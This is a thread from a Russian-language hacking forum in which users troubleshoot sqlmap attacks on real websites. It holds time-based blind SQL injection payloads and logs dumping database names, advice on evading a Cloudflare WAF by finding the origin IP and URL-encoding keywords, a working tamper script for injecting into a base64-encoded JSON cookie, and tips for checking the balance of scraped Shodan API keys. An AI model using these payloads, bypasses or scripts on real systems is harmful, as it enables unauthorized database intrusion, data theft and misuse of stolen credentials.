Этот запрос исключительно для детекта WAF на таргете, тамперы не заменяют в нем пейлоад. Это нормально.
Тут триггер конкретно на CONCAT. Достаточно перевести первую букву в урл энкод %A0%43ONCAT и триггера нет. Че сам то не пробуешь обходить?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
сталкнулся с такой проблемой
начала выскакивать got HTTP error code: 403 ('Forbidden')
естественно ничего не раскрутило и не вывело
я подставил тампер --tamper=between , и больше не ттрегерило, до того момента как не дошло до вывода бд но и они вывелись.
потом я попробовал --current-db , так как их показало 3, вывело спокойно 3 бд
ну когда дошло дело до таблиц начало трегерить и естественно таблицы оно не вывело
я посмотрел по пейлоду через браузер
оно то срабатывает то нет
вот скрин
Cloudflare Ray ID: 7a10306c5ab46781 • Your IP: • Performance & security by Cloudflare
Код:
POST https://www.site.com/Rare/Nymium?page=2 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com
Host: www.site.com
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"
testing@example.com*
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"
submit=
------------YWJkMTQzNDcw--начала выскакивать got HTTP error code: 403 ('Forbidden')
естественно ничего не раскрутило и не вывело
я подставил тампер --tamper=between , и больше не ттрегерило, до того момента как не дошло до вывода бд но и они вывелись.
Код:
(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 64,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 32,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 1,0,5)))))kDjP) AND 'oUAg'='oUAg
[17:01:31] [DEBUG] got HTTP error code: 403 ('Forbidden')
[17:01:31] [INFO] retrieved:
[17:01:31] [DEBUG] performed 3 queries in 1.97 seconds
[17:01:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [2]:
[*] information_schema
[*] test_db
Код:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"
testing@example.com' AND (SELECT 2942 FROM (SELECT(SLEEP(5)))PDwP) AND 'qtTO'='qtTO
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="submit"
submit=
------------YWJkMTQzNDcw--
---
[17:07:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[17:07:16] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[17:07:44] [INFO] confirming MySQL
[17:07:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:07:56] [INFO] adjusting time delay to 3 seconds due to good response times
[17:07:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[17:07:56] [INFO] fetching current database
[17:07:56] [INFO] retrieved: testdb_main
current database: 'testdb_main'
[17:12:50] [INFO] fetching database names
[17:12:50] [INFO] fetching number of databases
[17:12:50] [INFO] resumed: 3
[17:12:50] [INFO] resumed: information_schema
[17:12:50] [INFO] resumed: test_db
[17:12:50] [INFO] retrieved: testdb_main_main
available databases [3]:
[*] information_schema
[*] test_db
[*] testdb_mainя посмотрел по пейлоду через браузер
Код:
https://www.site.com/Rare/Nymium?page=2 testing@example.com' AND (SELECT 1402 FROM (SELECT(SLEEP(32-(IF(ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6a6f626d61737465726d61676e6574735f6d61696e),1,1)) NOT BETWEEN 0 AND 52,0,32)))))xHft) AND 'jEqx'='jEqxвот скрин
Cloudflare Ray ID: 7a10306c5ab46781 • Your IP: • Performance & security by Cloudflare
найди ип сайта за клаудом, потом --url="ip/path" ==host="site.com"сталкнулся с такой проблемой
Код:POST https://www.site.com/Rare/Nymium?page=2 HTTP/1.1 Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw X-Requested-With: XMLHttpRequest Referer: https://www.site.com Host: www.site.com Connection: Keep-alive ------------YWJkMTQzNDcw Content-Disposition: form-data; name="email" testing@example.com* ------------YWJkMTQzNDcw Content-Disposition: form-data; name="submit" submit= ------------YWJkMTQzNDcw--
начала выскакивать got HTTP error code: 403 ('Forbidden')
естественно ничего не раскрутило и не вывело
я подставил тампер --tamper=between , и больше не ттрегерило, до того момента как не дошло до вывода бд но и они вывелись.
потом я попробовал --current-db , так как их показало 3, вывело спокойно 3 бдКод:(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 64,0,5)))))kDjP) AND 'oUAg'='oUAg [17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden') [17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 32,0,5)))))kDjP) AND 'oUAg'='oUAg [17:01:30] [DEBUG] got HTTP error code: 403 ('Forbidden') [17:01:30] [PAYLOAD] testing@example.com' AND (SELECT 3315 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),1,1)) NOT BETWEEN 0 AND 1,0,5)))))kDjP) AND 'oUAg'='oUAg [17:01:31] [DEBUG] got HTTP error code: 403 ('Forbidden') [17:01:31] [INFO] retrieved: [17:01:31] [DEBUG] performed 3 queries in 1.97 seconds [17:01:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' available databases [2]: [*] information_schema [*] test_db
ну когда дошло дело до таблиц начало трегерить и естественно таблицы оно не вывелоКод:sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------------YWJkMTQzNDcw Content-Disposition: form-data; name="email" testing@example.com' AND (SELECT 2942 FROM (SELECT(SLEEP(5)))PDwP) AND 'qtTO'='qtTO ------------YWJkMTQzNDcw Content-Disposition: form-data; name="submit" submit= ------------YWJkMTQzNDcw-- --- [17:07:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [17:07:16] [INFO] testing MySQL do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [17:07:44] [INFO] confirming MySQL [17:07:44] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [17:07:56] [INFO] adjusting time delay to 3 seconds due to good response times [17:07:56] [INFO] the back-end DBMS is MySQL web application technology: PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [17:07:56] [INFO] fetching current database [17:07:56] [INFO] retrieved: testdb_main current database: 'testdb_main' [17:12:50] [INFO] fetching database names [17:12:50] [INFO] fetching number of databases [17:12:50] [INFO] resumed: 3 [17:12:50] [INFO] resumed: information_schema [17:12:50] [INFO] resumed: test_db [17:12:50] [INFO] retrieved: testdb_main_main available databases [3]: [*] information_schema [*] test_db [*] testdb_main
я посмотрел по пейлоду через браузер
оно то срабатывает то нетКод:https://www.site.com/Rare/Nymium?page=2 testing@example.com' AND (SELECT 1402 FROM (SELECT(SLEEP(32-(IF(ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6a6f626d61737465726d61676e6574735f6d61696e),1,1)) NOT BETWEEN 0 AND 52,0,32)))))xHft) AND 'jEqx'='jEqx
вот скрин
Cloudflare Ray ID: 7a10306c5ab46781 • Your IP: • Performance & security by Cloudflare
Возможно ли чекгнуть ключ шудан на баланс счета? ) Сори если офтоп, чат гпт сказала нельзя, но можно же, резве не?
Одна из кук представляет собой base64 кодированный JSON, один из элементов JSON'a вроде как уязвим судя ручным тестам, можно как то sqlmap заставить инжектить в определенную точку base64 encoded JSON'а ?
Как инжектиться в base64 encoded parameter я понял, а вот когда параметр это JSON и надо инжектиться в одно из значений понять не могу..
Как инжектиться в base64 encoded parameter я понял, а вот когда параметр это JSON и надо инжектиться в одно из значений понять не могу..
https://xss.pro/threads/75306/ оно? или я не понял вопрос?
Примерно, только JSON в запросе base64 закодирован, я могу что то сделать если мне надо инжектиться куда то в середину данных внутри JSON'а, как я понимаю если я использую --base64 в sqlmap и -p имя_куки то payload'ы пойдут в конец, астекриксом указать точку получается нереально? так как на входе base64 строка..
В POST данных мап корректно детектит JSON кеем --base64=value, но все равно будет проходить все параметры по очереди и точечно уязвимый параметр ты не укажешь, если данные в base кодировке, Только авто-последовательно или тамперами.
Сносочка: при этом он задает вопрос
it appears that provided value for POST parameter 'param' is JSON deserializable. Do you want to inject inside? [y/N]
потому или не ставим --batch или вместе с ним ставим --answers="deserializable=Y", т.к. по умолчанию он выберет N. Внимательнее нах!
В куках же, стандартными средствами мапа (при кодировке и кее --base64) - ' * ' вставить не получится (у меня не получилось), ибо астерикс
Потому рассмотрим на примере, накостылил))) У нас есть raw запрос к серваку такого вида
где decode json_cookie=eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzIn0= это {"id":"1","password":"23423423"} а бажная ins. point 23423423.
Накдываем тампер:
Python:
#!/usr/bin/env python
import base64
def tamper(payload, **kwargs):
params = '{"id":"1","password":"23423423%s"}' % payload
data = base64.b64encode(params.encode('utf-8'))
return data.decode('utf-8')Сохрани /sqlmap/tamper/tampz.py -имя ессно от балды
Теперь идем к raw запросу и в json_cookie=eyJpZCI6IjEiLCJwYXNzd29yZCI6IjIzNDIzNDIzIn0= удаляем base64. Оставляем пусоте значение (т.к. оно "захардкожено"
в тампере). чтоб вышлоCookie: dyfk2_k=;dyfk2_sid=2b19bdb476ccf1fc9ea464948276ac03;dyfk2_u=1;json_cookie=
save
Мапу подаем в таком виде
-r path/to/raw_file -p "json_cookie" --tamper=tampz --force-ssl --level=4 --risk=3 --dbms=mysql -v 3 --batch --answers="implementation=N"
ну и сотальные кеи, которые юзаешь дописывай.
Вывод -v 3
decode this
Соответственно, тебе остается только в тампере подставить свои данные, и вставить %s в любое (уязвимое) место JSON, середина это, начало, конец - роли не играет.
P.S. В числовых значениях кавычки не указываются, это я натупил, т.к. показал просто пример , а редачить уже лень
Последнее редактирование:
https://api.shodan[.]io/api-info?key=твой_ключ
Можешь даже пачками чекать:
GitHub - w4spy/shodan_keys_checker: This script written in python3 for sorting and categorizing Shodan API keys that you can find via scraping the internet
This script written in python3 for sorting and categorizing Shodan API keys that you can find via scraping the internet - GitHub - w4spy/shodan_keys_checker: This script written in python3 for sort...
github.com
подскажите можно ли как то на это повлиять ?
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
пробовал менять --threads=
не помогло
если бы оно сливало нормлаьно то ладно еще, через время начинается
resumed: 13?3
или вообще начинает пропускать
resumed:
resumed:
resumed:
resumed:
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Код:
[05:28:56] [ERROR] invalid character detected. retrying..
[05:28:56] [WARNING] increasing time delay to 4 seconds
e
[05:30:03] [ERROR] invalid character detected. retrying..
[05:30:03] [WARNING] increasing time delay to 5 seconds
[05:30:55] [ERROR] invalid character detected. retrying..
[05:30:55] [WARNING] increasing time delay to 6 seconds
[05:32:35] [ERROR] invalid character detected. retrying..
[05:32:35] [WARNING] increasing time delay to 7 seconds
[05:33:03] [ERROR] invalid character detected. retrying..
[05:33:03] [WARNING] increasing time delay to 8 seconds
[05:33:34] [ERROR] invalid character detected. retrying..
[05:33:34] [WARNING] increasing time delay to 9 seconds
[05:34:07] [ERROR] unable to properly validate last character value ('')..
ed
[05:35:16] [ERROR] invalid character detected. retrying..
[05:35:16] [WARNING] increasing time delay to 4 seconds
_users
[05:38:58] [INFO] retrieved: dbp_
[05:40:24] [ERROR] invalid character detected. retrying..
[05:40:24] [WARNING] increasing time delay to 5 seconds
notification_uпробовал менять --threads=
не помогло
если бы оно сливало нормлаьно то ладно еще, через время начинается
resumed: 13?3
или вообще начинает пропускать
resumed:
resumed:
resumed:
resumed:
А че конкретно помочь? GET /download/?ref=1'"&testAndroid=1 HTTP/1.1
после в ref=1 * поставь вместо '"
Т.е. в файл засунь так
Скрытый контент для пользователей: sql-dump.
в мап вбей
-r path/to/file/sql.txt --force-ssl --level=4 --risk=3 --dbms=mysql -o
ну и какие ты там кем еще юзаешь, прокси, рандом агент, тайм сек я хз. В чем конкретно проблема? У тебя точка вставки некорректно указана.
делал примерно так только у меня были еще лишние параметры,поставил опять в мап о результате отпишу в теме,ты просто составил команду или попробывал в мапе?
Я не пробовал в мапе, т.к. не раскручиваю чужие таргеты и по чужим уязвимостям не хожу.. Я могу посоветовать, основываясь на той инфе, что ты предоставил Тем более не вижу конкретного вопроса, где ошибка и что не так.
Если не получится, пиши, где именно лажа возникает.
Последнее редактирование:
Бро я как понял, ты просто не указал мапе, место куда нужно пейлоад вставлять.
Можно переименовать тему